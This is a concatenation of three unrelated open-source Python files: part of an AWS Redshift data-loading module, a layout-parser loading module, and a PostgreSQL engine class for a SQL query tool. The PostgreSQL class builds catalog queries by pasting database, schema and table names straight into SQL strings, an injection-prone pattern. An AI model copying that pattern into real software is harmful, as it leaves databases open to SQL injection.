str]] = None, diststyle: str = "AUTO", distkey: Optional[str] = None, sortstyle: str = "COMPOUND", sortkey: Optional[List[str]] = None, primary_keys: Optional[List[str]] = None, varchar_lengths_default: int = 256, varchar_lengths: Optional[Dict[str, int]] = None, use_column_names: bool = False, lock: bool = False, chunksize: int = 200, commit_transaction: bool = True, ) -> None: """Write records stored in a DataFrame into Redshift. Note ---- For large DataFrames (1K+ rows) consider the function **wr.redshift.copy()**.
Parameters ---------- df : pandas.DataFrame Pandas DataFrame https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html con : redshift_connector.Connection Use redshift_connector.connect() to use credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. table : str Table name schema : str Schema name mode : str Append, overwrite or upsert. overwrite_method : str Drop, cascade, truncate, or delete. Only applicable in overwrite mode. "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it. "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it. "truncate" - ``TRUNCATE ...`` - truncates the table, but immediately commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. index : bool True to store the DataFrame index as a column in the table, otherwise False to ignore it. dtype: Dict[str, str], optional Dictionary of column names and Redshift types to be casted. Useful when you have columns with undetermined or mixed data types. (e.g. {'col name': 'VARCHAR(10)', 'col2 name': 'FLOAT'}) diststyle : str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). use_column_names: bool If set to True, will use the column names of the DataFrame for generating the INSERT SQL Query. E.g. If the DataFrame has two columns `col1` and `col3` and `use_column_names` is True, data will only be inserted into the database columns `col1` and `col3`. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. chunksize: int Number of rows which are inserted with each SQL query. Defaults to inserting 200 rows per query. commit_transaction: bool Whether to commit the transaction. True by default. Returns ------- None None. Examples -------- Writing to Redshift using a Glue Catalog Connection >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.to_sql( ... df=df, ... table="my_table", ... schema="public", ... con=con ...
) >>> con.close() """ if df.empty is True: raise exceptions.EmptyDataFrame() _validate_connection(con=con) autocommit_temp: bool = con.autocommit con.autocommit = False try: with con.cursor() as cursor: created_table, created_schema = _create_table( df=df, path=None, con=con, cursor=cursor, table=table, schema=schema, mode=mode, overwrite_method=overwrite_method, index=index, dtype=dtype, diststyle=diststyle, sortstyle=sortstyle, distkey=distkey, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, ) if index: df.reset_index(level=df.index.names, inplace=True) column_placeholders: str = ", ".join(["%s"] * len(df.columns)) schema_str = f'"{created_schema}".' if created_schema else "" insertion_columns = "" if use_column_names: insertion_columns = f"({', '.join(df.columns)})" placeholder_parameter_pair_generator = _db_utils.generate_placeholder_parameter_pairs( df=df, column_placeholders=column_placeholders, chunksize=chunksize ) for placeholders, parameters in placeholder_parameter_pair_generator: sql: str = f'INSERT INTO {schema_str}"{created_table}" {insertion_columns} VALUES {placeholders}' _logger.debug("sql: %s", sql) cursor.executemany(sql, (parameters,)) if table != created_table: # upsert if lock: _lock(cursor, [table], schema=schema) _upsert(cursor=cursor, schema=schema, table=table, temp_table=created_table, primary_keys=primary_keys) if commit_transaction: con.commit() except Exception as ex: con.rollback() _logger.error(ex) raise finally: con.autocommit = autocommit_temp def unload_to_files( sql: str, path: str, con: redshift_connector.Connection, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, region: Optional[str] = None, unload_format: Optional[str] = None, max_file_size: Optional[float] = None, kms_key_id: Optional[str] = None, manifest: bool = False, partition_cols: Optional[List[str]] = None, boto3_session: Optional[boto3.Session] = None, ) -> None: """Unload Parquet files on S3 from a Redshift query result (through the UNLOAD command). https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html Parameters ---------- sql: str SQL query. path : str S3 path to write stage files (e.g. s3://bucket_name/any_name/) con : redshift_connector.Connection Use redshift_connector.connect() to use credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. region : str, optional Specifies the AWS Region where the target Amazon S3 bucket is located. REGION is required for UNLOAD to an Amazon S3 bucket that isn't in the same AWS Region as the Amazon Redshift cluster. By default, UNLOAD assumes that the target Amazon S3 bucket is located in the same AWS Region as the Amazon Redshift cluster. unload_format: str, optional Format of the unloaded S3 objects from the query. Valid values: "CSV", "PARQUET". Case sensitive. Defaults to PARQUET.
max_file_size : float, optional Specifies the maximum size (MB) of files that UNLOAD creates in Amazon S3. Specify a decimal value between 5.0 MB and 6200.0 MB. If None, the default maximum file size is 6200.0 MB. kms_key_id : str, optional Specifies the key ID for an AWS Key Management Service (AWS KMS) key to be used to encrypt data files on Amazon S3. manifest : bool Unload a manifest file on S3. partition_cols: List[str], optional Specifies the partition keys for the unload operation. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receives None. Returns ------- None Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.unload_to_files( ... sql="SELECT * FROM public.mytable", ... path="s3://bucket/extracted_parquet_files/", ... con=con, ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ if unload_format not in [None, "CSV", "PARQUET"]: raise exceptions.InvalidArgumentValue("<unload_format> argument must be 'CSV' or 'PARQUET'") session: boto3.Session = _utils.ensure_session(session=boto3_session) with con.cursor() as cursor: format_str: str = unload_format or "PARQUET" partition_str: str = f"\nPARTITION BY ({','.join(partition_cols)})" if partition_cols else "" manifest_str: str = "\nmanifest" if manifest is True else "" region_str: str = f"\nREGION AS '{region}'" if region is not None else "" max_file_size_str: str = f"\nMAXFILESIZE AS {max_file_size} MB" if max_file_size is not None else "" kms_key_id_str: str = f"\nKMS_KEY_ID '{kms_key_id}'" if kms_key_id is not None else "" auth_str: str = _make_s3_auth_string( iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=session, ) sql = ( f"UNLOAD ('{sql}')\n" f"TO '{path}'\n" f"{auth_str}" "ALLOWOVERWRITE\n" "PARALLEL ON\n" f"FORMAT {format_str}\n" "ENCRYPTED" f"{kms_key_id_str}" f"{partition_str}" f"{region_str}" f"{max_file_size_str}" f"{manifest_str};" ) _logger.debug("sql: \n%s", sql) cursor.execute(sql) def unload( sql: str, path: str, con: redshift_connector.Connection, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, region: Optional[str] = None, max_file_size: Optional[float] = None, kms_key_id: Optional[str] = None, categories: Optional[List[str]] = None, chunked: Union[bool, int] = False, keep_files: bool = False, use_threads: Union[bool, int] = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Load a Pandas DataFrame from an Amazon Redshift query result using Parquet files on S3 as a stage. This is a **HIGH** latency and **HIGH** throughput alternative to `wr.redshift.read_sql_query()`/`wr.redshift.read_sql_table()` to extract large Amazon Redshift data into Pandas DataFrames through the **UNLOAD command**. This strategy has more overhead and requires more IAM privileges than the regular `wr.redshift.read_sql_query()`/`wr.redshift.read_sql_table()` function, so it is only recommended for fetching 1K+ rows at once. https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html Note ---- ``Batching`` (`chunked` argument) (Memory Friendly): Will enable the function to return an Iterable of DataFrames instead of a regular DataFrame.
There are two batching strategies on Wrangler: - If **chunked=True**, a new DataFrame will be returned for each file in your path/dataset. - If **chunked=INTEGER**, Wrangler will iterate on the data by number of rows (equal to the received INTEGER). `P.S.` `chunked=True` is faster and uses less memory while `chunked=INTEGER` is more precise in the number of rows for each DataFrame. Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- sql: str SQL query. path : str S3 path to write stage files (e.g. s3://bucket_name/any_name/) con : redshift_connector.Connection Use redshift_connector.connect() to use credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. region : str, optional Specifies the AWS Region where the target Amazon S3 bucket is located. REGION is required for UNLOAD to an Amazon S3 bucket that isn't in the same AWS Region as the Amazon Redshift cluster. By default, UNLOAD assumes that the target Amazon S3 bucket is located in the same AWS Region as the Amazon Redshift cluster. max_file_size : float, optional Specifies the maximum size (MB) of files that UNLOAD creates in Amazon S3. Specify a decimal value between 5.0 MB and 6200.0 MB. If None, the default maximum file size is 6200.0 MB. kms_key_id : str, optional Specifies the key ID for an AWS Key Management Service (AWS KMS) key to be used to encrypt data files on Amazon S3. categories: List[str], optional List of column names that should be returned as pandas.Categorical. Recommended for memory restricted environments. keep_files : bool Whether to keep the stage files. chunked : Union[int, bool] If passed will split the data into an Iterable of DataFrames (Memory friendly). If `True` wrangler will iterate on the data by files in the most efficient way without guarantee of chunksize. If an `INTEGER` is passed Wrangler will iterate on the data by number of rows equal to the received INTEGER. use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receives None. s3_additional_kwargs: Forwarded to botocore requests; only "SSECustomerAlgorithm" and "SSECustomerKey" arguments will be considered. Returns ------- Union[pandas.DataFrame, Iterator[pandas.DataFrame]] Result as Pandas DataFrame(s). Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> df = wr.redshift.unload( ... sql="SELECT * FROM public.mytable", ... path="s3://bucket/extracted_parquet_files/", ... con=con, ... iam_role="arn:aws:iam::XXX:role/XXX" ...
) >>> con.close() """ path = path if path.endswith("/") else f"{path}/" session: boto3.Session = _utils.ensure_session(session=boto3_session) unload_to_files( sql=sql, path=path, con=con, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, region=region, max_file_size=max_file_size, kms_key_id=kms_key_id, manifest=False, boto3_session=session, ) if chunked is False: df: pd.DataFrame = s3.read_parquet( path=path, categories=categories, chunked=chunked, dataset=False, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs ) return df return _read_parquet_iterator( path=path, categories=categories, chunked=chunked, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, keep_files=keep_files, ) def copy_from_files( # pylint: disable=too-many-locals,too-many-arguments path: str, con: redshift_connector.Connection, table: str, schema: str, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, parquet_infer_sampling: float = 1.0, mode: str = "append", overwrite_method: str = "drop", diststyle: str = "AUTO", distkey: Optional[str] = None, sortstyle: str = "COMPOUND", sortkey: Optional[List[str]] = None, primary_keys: Optional[List[str]] = None, varchar_lengths_default: int = 256, varchar_lengths: Optional[Dict[str, int]] = None, serialize_to_json: bool = False, path_suffix: Optional[str] = None, path_ignore_suffix: Optional[str] = None, use_threads: Union[bool, int] = True, lock: bool = False, commit_transaction: bool = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> None: """Load Parquet files from S3 to a Table on Amazon Redshift (through the COPY command). https://docs.aws.amazon.com/redshift/latest/dg/r_COPY.html Note ---- If the table does not exist yet, it will be automatically created for you using the Parquet metadata to infer the column data types. Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- path : str S3 prefix (e.g. s3://bucket/prefix/) con : redshift_connector.Connection Use redshift_connector.connect() to use credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. table : str Table name schema : str Schema name iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. parquet_infer_sampling : float Random sample ratio of files that will have the metadata inspected. Must be `0.0 < sampling <= 1.0`. The higher, the more accurate. The lower, the faster. mode : str Append, overwrite or upsert. overwrite_method : str Drop, cascade, truncate, or delete. Only applicable in overwrite mode. "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it. "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it.
"truncate" - ``TRUNCATE ...`` - truncates the table, but immediatly commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. diststyle : str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). serialize_to_json : bool Should Wrangler add SERIALIZETOJSON parameter into the COPY command? SERIALIZETOJSON is necessary to load nested data https://docs.aws.amazon.com/redshift/latest/dg/ingest-super.html#copy_json path_suffix: Union[str, List[str], None] Suffix or List of suffixes to be scanned on s3 for the schema extraction (e.g. [".gz.parquet", ".snappy.parquet"]). Only has effect during the table creation. If None, will try to read all files. (default) path_ignore_suffix: Union[str, List[str], None] Suffix or List of suffixes for S3 keys to be ignored during the schema extraction. (e.g. [".csv", "_SUCCESS"]). Only has effect during the table creation. If None, will try to read all files. (default) use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. commit_transaction: bool Whether to commit the transaction. True by default. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. s3_additional_kwargs: Forwarded to botocore requests. e.g. s3_additional_kwargs={'ServerSideEncryption': 'aws:kms', 'SSEKMSKeyId': 'YOUR_KMS_KEY_ARN'} Returns ------- None None. Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.copy_from_files( ... path="s3://bucket/my_parquet_files/", ... con=con, ... table="my_table", ... schema="public" ... iam_role="arn:aws:iam::XXX:role/XXX" ... 
) >>> con.close() """ autocommit_temp: bool = con.autocommit con.autocommit = False try: with con.cursor() as cursor: created_table, created_schema = _create_table( df=None, path=path, parquet_infer_sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, con=con, cursor=cursor, table=table, schema=schema, mode=mode, overwrite_method=overwrite_method, diststyle=diststyle, sortstyle=sortstyle, distkey=distkey, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, index=False, dtype=None, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs, ) if lock and table == created_table: # Lock before copy if copying into target (not temp) table _lock(cursor, [table], schema=schema) _copy( cursor=cursor, path=path, table=created_table, schema=created_schema, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=boto3_session, serialize_to_json=serialize_to_json, ) if table != created_table: # upsert if lock: _lock(cursor, [table], schema=schema) _upsert(cursor=cursor, schema=schema, table=table, temp_table=created_table, primary_keys=primary_keys) if commit_transaction: con.commit() except Exception as ex: con.rollback() _logger.error(ex) raise finally: con.autocommit = autocommit_temp def copy( # pylint: disable=too-many-arguments df: pd.DataFrame, path: str, con: redshift_connector.Connection, table: str, schema: str, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, index: bool = False, dtype: Optional[Dict[str, str]] = None, mode: str = "append", overwrite_method: str = "drop", diststyle: str = "AUTO", distkey: Optional[str] = None, sortstyle: str = "COMPOUND", sortkey: Optional[List[str]] = None, primary_keys: Optional[List[str]] = None, varchar_lengths_default: int = 256, varchar_lengths: Optional[Dict[str, int]] = None, serialize_to_json: bool = False, keep_files: bool = False, use_threads: Union[bool, int] = True, lock: bool = False, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, max_rows_by_file: Optional[int] = 10_000_000, ) -> None: """Load Pandas DataFrame as a Table on Amazon Redshift using Parquet files on S3 as a stage. This is a **HIGH** latency and **HIGH** throughput alternative to `wr.redshift.to_sql()` to load large DataFrames into Amazon Redshift through the **SQL COPY command**. This strategy has more overhead and requires more IAM privileges than the regular `wr.redshift.to_sql()` function, so it is only recommended for inserting 1K+ rows at once. https://docs.aws.amazon.com/redshift/latest/dg/r_COPY.html Note ---- If the table does not exist yet, it will be automatically created for you using the Parquet metadata to infer the column data types. Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- df: pandas.DataFrame Pandas DataFrame. path : str S3 path to write stage files (e.g. s3://bucket_name/any_name/). Note: This path must be empty. con : redshift_connector.Connection Use redshift_connector.connect() to use credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog.
table : str Table name schema : str Schema name iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. index : bool True to store the DataFrame index in file, otherwise False to ignore it. dtype: Dict[str, str], optional Dictionary of column names and Athena/Glue types to be casted. Useful when you have columns with undetermined or mixed data types. Only takes effect if dataset=True. (e.g. {'col name': 'bigint', 'col2 name': 'int'}) mode: str Append, overwrite or upsert. overwrite_method : str Drop, cascade, truncate, or delete. Only applicable in overwrite mode. "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it. "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it. "truncate" - ``TRUNCATE ...`` - truncates the table, but immediately commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. diststyle: str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). keep_files : bool Whether to keep the stage files. use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receives None. s3_additional_kwargs: Forwarded to botocore requests. e.g. s3_additional_kwargs={'ServerSideEncryption': 'aws:kms', 'SSEKMSKeyId': 'YOUR_KMS_KEY_ARN'} max_rows_by_file : int, optional Max number of rows in each file. (e.g. 33554432, 268435456). Defaults to 10,000,000; pass None to avoid splitting the files. Returns ------- None None. Examples -------- >>> import awswrangler as wr >>> import pandas as pd >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.copy( ... df=pd.DataFrame({'col': [1, 2, 3]}), ... path="s3://bucket/my_parquet_files/", ... con=con, ... table="my_table", ... schema="public", ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ path = path[:-1] if path.endswith("*") else path path = path if path.endswith("/") else f"{path}/" session: boto3.Session = _utils.ensure_session(session=boto3_session) if s3.list_objects(path=path, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs): raise exceptions.InvalidArgument( f"The received S3 path ({path}) is not empty. 
" "Please, provide a different path or use wr.s3.delete_objects() to clean up the current one." ) try: s3.to_parquet( df=df, path=path, index=index, dataset=True, mode="append", dtype=dtype, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, max_rows_by_file=max_rows_by_file, ) copy_from_files( path=path, con=con, table=table, schema=schema, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, mode=mode, overwrite_method=overwrite_method, diststyle=diststyle, distkey=distkey, sortstyle=sortstyle, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, serialize_to_json=serialize_to_json, use_threads=use_threads, lock=lock, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) finally: if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs )
# Copyright 2021 The Layout Parser team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import ast import json from typing import List, Union, Dict, Any import pandas as pd from ..elements import ( BaseLayoutElement, TextBlock, Layout, BASECOORD_ELEMENT_NAMEMAP, ) def load_json(filename: str) -> Union[BaseLayoutElement, Layout]: """Load a JSON file and save it as a layout object with appropriate data types. Args: filename (str): The name of the JSON file. Returns: Union[BaseLayoutElement, Layout]: Based on the JSON file format, it will automatically parse the type of the data and load it accordingly. """ with open(filename, "r") as fp: res = json.load(fp) return load_dict(res) def load_dict(data: Union[Dict, List[Dict]]) -> Union[BaseLayoutElement, Layout]: """Load a dict or list of dict representations of some layout data, automatically parse its type, and save it as any of BaseLayoutElement or Layout datatype. Args: data (Union[Dict, List]): A dict or list of dict representations of the layout data Raises: ValueError: If the data format is incompatible with the layout-data-JSON format, raise a `ValueError`. ValueError: If any `block_type` name is not in the available list of layout element names defined in `BASECOORD_ELEMENT_NAMEMAP`, raise a `ValueError`. Returns: Union[BaseLayoutElement, Layout]: Based on the dict format, it will automatically parse the type of the data and load it accordingly. """ if isinstance(data, dict): if "page_data" in data: # It is a layout instance return Layout(load_dict(data["blocks"]), page_data=data["page_data"]) else: if data["block_type"] not in BASECOORD_ELEMENT_NAMEMAP: raise ValueError(f"Invalid block_type {data['block_type']}") # Check if it is a textblock is_textblock = any(ele in data for ele in TextBlock._features) if is_textblock: return TextBlock.from_dict(data) else: return BASECOORD_ELEMENT_NAMEMAP[data["block_type"]].from_dict(data) elif isinstance(data, list): return Layout([load_dict(ele) for ele in data]) else: raise ValueError("Invalid input JSON structure.") def load_csv(filename: str, block_type: str = None) -> Layout: """Load the Layout object from the given CSV file. Args: filename (str): The name of the CSV file. A row of the table represents an individual layout element. block_type (str): If there's no block_type column in the CSV file, you must pass in a block_type variable such that layout parser can appropriately detect the type of the layout elements. Returns: Layout: The parsed Layout object from the CSV file. """ return load_dataframe(pd.read_csv(filename), block_type=block_type) def load_dataframe(df: pd.DataFrame, block_type: str = None) -> Layout: """Load the Layout object from the given dataframe. Args: df (pd.DataFrame): block_type (str): If there's no block_type column in the CSV file, you must pass in a block_type variable such that layout parser can appropriately detect the type of the layout elements. Returns: Layout: The parsed Layout object from the CSV file.
""" df = df.copy() if "points" in df.columns: if df["points"].dtype == object: df["points"] = df["points"].map( lambda x: ast.literal_eval(x) if not pd.isna(x) else x ) if block_type is None: if "block_type" not in df.columns: raise ValueError( "`block_type` not specified both in dataframe and arguments" ) else: df["block_type"] = block_type if "id" not in df.columns: df["id"] = df.index return load_dict(df.apply(lambda x: x.dropna().to_dict(), axis=1).to_list())
# -*- coding: UTF-8 -*- """ @author: hhyo、yyukai @license: Apache Licence @file: pgsql.py @time: 2019/03/29 """ import re import psycopg2 import logging import traceback import sqlparse from . import EngineBase from .models import ResultSet __author__ = 'hhyo、yyukai' logger = logging.getLogger('default') class PgSQLEngine(EngineBase): def get_connection(self, db_name=None): if self.conn: return self.conn db_name = db_name if db_name else 'postgres' self.conn = psycopg2.connect(host=self.host, port=self.port, user=self.user, password=self.password, dbname=db_name) return self.conn @property def name(self): return 'PgSQL' @property def info(self): return 'PgSQL engine' def get_all_databases(self): """ Get the list of databases :return: """ result = self.query(sql="SELECT datname FROM pg_database;") db_list = [row[0] for row in result.rows if row[0] not in ['postgres', 'template0', 'template1']] result.rows = db_list return result def get_all_schemas(self, db_name): """ Get the list of schemas :return: """ result = self.query(db_name=db_name, sql="select schema_name from information_schema.schemata;") schema_list = [row[0] for row in result.rows if row[0] not in ['information_schema', 'pg_catalog', 'pg_toast_temp_1', 'pg_temp_1', 'pg_toast']] result.rows = schema_list return result def get_all_tables(self, db_name, schema_name=None): """ Get the list of tables :param db_name: :param schema_name: :return: """ sql = f"""SELECT table_name FROM information_schema.tables where table_catalog='{db_name}' and table_schema ='{schema_name}';""" result = self.query(db_name=db_name, sql=sql) tb_list = [row[0] for row in result.rows if row[0] not in ['test']] result.rows = tb_list return result def get_all_columns_by_tb(self, db_name, tb_name, schema_name=None): """ Get the list of columns :param db_name: :param tb_name: :param schema_name: :return: """ sql = f"""SELECT column_name FROM information_schema.columns where table_catalog='{db_name}' and table_name='{tb_name}' and table_schema ='{schema_name}';""" result = self.query(db_name=db_name, sql=sql) column_list = [row[0] for row in result.rows] result.rows = column_list return result def describe_table(self, db_name, tb_name, schema_name=None): """ Get table structure information :param db_name: :param tb_name: :param schema_name: :return: """ sql = fr"""select col.column_name, col.data_type, col.character_maximum_length, col.numeric_precision, col.numeric_scale, col.is_nullable, col.column_default, des.description from information_schema.columns col left join pg_description des on col.table_name::regclass = des.objoid and col.ordinal_position = des.objsubid where table_catalog='{db_name}' and table_schema = '{schema_name}' and table_name = '{tb_name}' order by ordinal_position;""" result = self.query(db_name=db_name, sql=sql) return result def query_check(self, db_name=None, sql=''): # Check the query statement, strip comments, and split it result = {'msg': '', 'bad_query': False, 'filtered_sql': sql, 'has_star': False} # Strip comment statements, validate the syntax, and execute the first valid SQL statement try: sql = sqlparse.format(sql, strip_comments=True) sql = sqlparse.split(sql)[0] result['filtered_sql'] = sql.strip() except IndexError: result['has_star'] = True result['msg'] = 'No valid SQL statement' if re.match(r"^select", sql, re.I) is None: result['bad_query'] = True result['msg'] = 'Unsupported query syntax type!'
if '*' in sql: result['has_star'] = True result['msg'] = 'The SQL statement contains * ' return result def query(self, db_name=None, sql='', limit_num=0, close_conn=True): """Return a ResultSet """ result_set = ResultSet(full_sql=sql) try: conn = self.get_connection(db_name=db_name) cursor = conn.cursor() cursor.execute(sql) effect_row = cursor.rowcount if int(limit_num) > 0: rows = cursor.fetchmany(size=int(limit_num)) else: rows = cursor.fetchall() fields = cursor.description result_set.column_list = [i[0] for i in fields] if fields else [] result_set.rows = rows result_set.affected_rows = effect_row except Exception as e: logger.error(f"PgSQL command execution failed, statement: {sql}, error: {traceback.format_exc()}") result_set.error = str(e) finally: if close_conn: self.close() return result_set def filter_sql(self, sql='', limit_num=0): # Add a LIMIT clause to the query SQL. # TODO: the limit rewrite needs optimization sql_lower = sql.lower().rstrip(';').strip() if re.match(r"^select", sql_lower): if re.search(r"limit\s+(\d+)$", sql_lower) is None: if re.search(r"limit\s+\d+\s*,\s*(\d+)$", sql_lower) is None: return f"{sql.rstrip(';')} limit {limit_num};" return f"{sql.rstrip(';')};" def query_masking(self, db_name=None, sql='', resultset=None): """No data masking applied""" return resultset def close(self): if self.conn: self.conn.close() self.conn = None
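# --- Hedged illustration of the filter_sql() limit rewrite above ---
# A standalone re-implementation of the same rule so it can be exercised
# without an EngineBase subclass or a live PostgreSQL connection: a SELECT
# without a trailing LIMIT gets "limit N" appended; statements that already
# end in a LIMIT are returned unchanged apart from the trailing semicolon.
import re


def append_limit(sql: str, limit_num: int) -> str:
    sql_lower = sql.lower().rstrip(';').strip()
    if re.match(r"^select", sql_lower):
        if re.search(r"limit\s+(\d+)$", sql_lower) is None:
            if re.search(r"limit\s+\d+\s*,\s*(\d+)$", sql_lower) is None:
                return f"{sql.rstrip(';')} limit {limit_num};"
    return f"{sql.rstrip(';')};"


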